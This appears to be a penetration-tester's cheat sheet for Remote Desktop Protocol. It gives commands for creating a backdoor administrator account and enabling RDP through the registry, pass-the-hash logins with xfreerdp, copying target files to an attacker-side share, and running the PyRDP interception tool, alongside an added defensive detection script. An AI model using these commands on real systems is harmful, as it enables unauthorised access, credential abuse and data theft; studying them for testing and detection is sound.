Remote Desktop Protocol (RDP) – Port 3389

If you find .rdp files, see Mimikatz for Windows Credential Manager.

For RDP over SSH, see Port Forwarding / Tunneling.

Bruteforce

See Crowbar.

Connect to RDP from Kali

Prerequisites

The user must be a member of the “Remote Desktop Users” group to log in over RDP, and RDP connections must be enabled on the host (fDenyTSConnections set to 0).

net user myprecious MyPrecious123 /add
net localgroup Administrators myprecious /add
net localgroup "Remote Desktop Users" myprecious /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user myprecious
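
Seen from the defender's side, the prerequisite commands leave a recognisable trail: Security event 4720 (account created), 4732 (member added to a local group) and, where Sysmon is deployed, event 13 for the fDenyTSConnections value. The following detection sketch is an added example, not part of the original page; the flattened dict layout, the sample events and the 10-minute window are assumptions.

```python
from datetime import datetime, timedelta

# Well-known SIDs of the built-in groups the commands above modify.
WATCHED = {"S-1-5-32-544": "Administrators", "S-1-5-32-555": "Remote Desktop Users"}
RDP_VALUE = r"\control\terminal server\fdenytsconnections"
WINDOW = timedelta(minutes=10)  # assumption: tune to your environment

# Constructed sample events, flattened to dicts (not real log data).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "host": "WS01", "id": 4720,
     "TargetSid": "S-1-5-21-1-2-3-1005", "TargetUserName": "myprecious"},
    {"time": "2024-05-01T10:00:09", "host": "WS01", "id": 4732,
     "MemberSid": "S-1-5-21-1-2-3-1005", "TargetSid": "S-1-5-32-544"},
    {"time": "2024-05-01T10:00:12", "host": "WS01", "id": 4732,
     "MemberSid": "S-1-5-21-1-2-3-1005", "TargetSid": "S-1-5-32-555"},
    {"time": "2024-05-01T10:00:20", "host": "WS01", "id": 13,  # Sysmon
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\"
                     "Terminal Server\\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"time": "2024-05-01T11:30:00", "host": "WS02", "id": 4720,
     "TargetSid": "S-1-5-21-9-9-9-1101", "TargetUserName": "newhire"},
]

def detect(events):
    """Alert on accounts added to a watched group soon after creation."""
    created, rdp_on, alerts = {}, {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:      # a user account was created
            created[(ev["host"], ev["TargetSid"])] = (ts, ev["TargetUserName"])
        elif ev["id"] == 4732 and ev["TargetSid"] in WATCHED:  # group add
            key = (ev["host"], ev["MemberSid"])
            if key in created and ts - created[key][0] <= WINDOW:
                a = alerts.setdefault(key, {"host": key[0], "user": created[key][1],
                                            "created": created[key][0], "groups": []})
                a["groups"].append(WATCHED[ev["TargetSid"]])
        elif (ev["id"] == 13 and ev["TargetObject"].lower().endswith(RDP_VALUE)
              and ev["Details"].endswith("(0x00000000)")):  # RDP switched on
            rdp_on.setdefault(ev["host"], []).append(ts)
    for a in alerts.values():  # registry change may precede or follow the account
        a["rdp_enabled"] = any(abs(t - a["created"]) <= WINDOW
                               for t in rdp_on.get(a["host"], []))
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Matching on group SIDs rather than group names keeps the rule working on hosts where the built-in groups are localised.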

rdesktop

rdesktop is a basic Linux remote desktop client.

rdesktop $IP -u <username>
rdesktop $IP -u <username> -p <password> -g 1024x768 -x 0x80

Sharing Kali directory /home/kali/share

Redirects a path to the share \\tsclient\<sharename> on the server (requires Windows XP or newer). The share name is limited to 8 characters.

rdesktop $IP -d <domain> -u <username> -r disk:myshare=/home/kali/share

Access the share on Windows

dir \\tsclient\myshare
copy <filename> \\tsclient\myshare\

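FreeRDP

Use FreeRDP, an X11 client already installed on Kali Linux. Note that /cert:ignore skips validation of the server certificate, so the client will not notice an interposed proxy such as PyRDP (see below).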

man xfreerdp
xfreerdp /cert:ignore /f /u:${USER} /v:$IP
xfreerdp /cert:ignore /u:${USER} /pth:${NTLM_HASH} /v:${IP}
xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /pth:${NTLM_HASH} /v:${IP}
xfreerdp /cert:ignore /f /u:${USER} /p:${PASS} /v:$IP:$PORT
xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /v:$IP:3389 /drive:myshare,/home/kali/share

Access the share on Windows

dir \\tsclient\myshare

Connect to RDP from Windows

Type rdp in the Windows search bar.

Remote Desktop Connection Manager

Local user

<machine name>\<username>
.\<username>

RDP Server

  • xrdp – Open-source Remote Desktop Protocol server
sudo apt install -y kali-desktop-xfce xorg xrdp
sudo systemctl enable xrdp --now
sudo adduser xrdp ssl-cert
sudo reboot

The service status output shows the port xrdp is listening on.

sudo systemctl status xrdp

Connect as usual with mstsc or rdesktop.

PyRDP attack tool

PyRDP is a Python Remote Desktop Protocol (RDP) Monster-in-the-Middle (MITM) tool and library.

Official Documentation

Installation

git clone https://github.com/gosecure/pyrdp.git
apt install python3.9-venv
cd pyrdp
python3 -m venv venv
source venv/bin/activate
pip3 install -U pip setuptools wheel
pip3 install -U -e '.[full]'

If you ever want to leave your virtual environment, you can simply deactivate it:

deactivate

Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.

cd pyrdp
python3 -m venv venv
source venv/bin/activate

Help

pyrdp-mitm.py -h

Monster-in-the-middle

pyrdp-mitm.py $IP
# For the replay
pyrdp-mitm.py -l 0.0.0.0:3389 <public IP>

Configure port forwarding in VirtualBox or VMware:

Host port: 13389
Guest port: 3389